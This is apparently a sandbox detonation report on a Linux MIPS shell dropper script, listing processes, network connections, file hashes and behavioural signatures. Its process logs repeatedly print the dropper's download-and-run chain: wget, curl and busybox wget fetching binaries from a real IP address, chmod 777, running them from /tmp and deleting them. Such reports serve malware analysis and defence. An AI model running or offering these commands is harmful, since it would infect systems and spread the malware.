[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 01:00

Reported

2024-11-10 01:03

Platform

debian9-mipsel-20240729-en

Max time kernel

56s

Max time network

58s

Command Line

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A
N/A /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF N/A
N/A /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl N/A
N/A /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug N/A
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /usr/bin/curl N/A
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A

Processes

/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh

[/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/chmod

[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF

[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/bin/rm

[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/wget

[wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/chmod

[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl

[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/bin/rm

[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]

/usr/bin/wget

[wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/chmod

[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug

[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]

/bin/rm

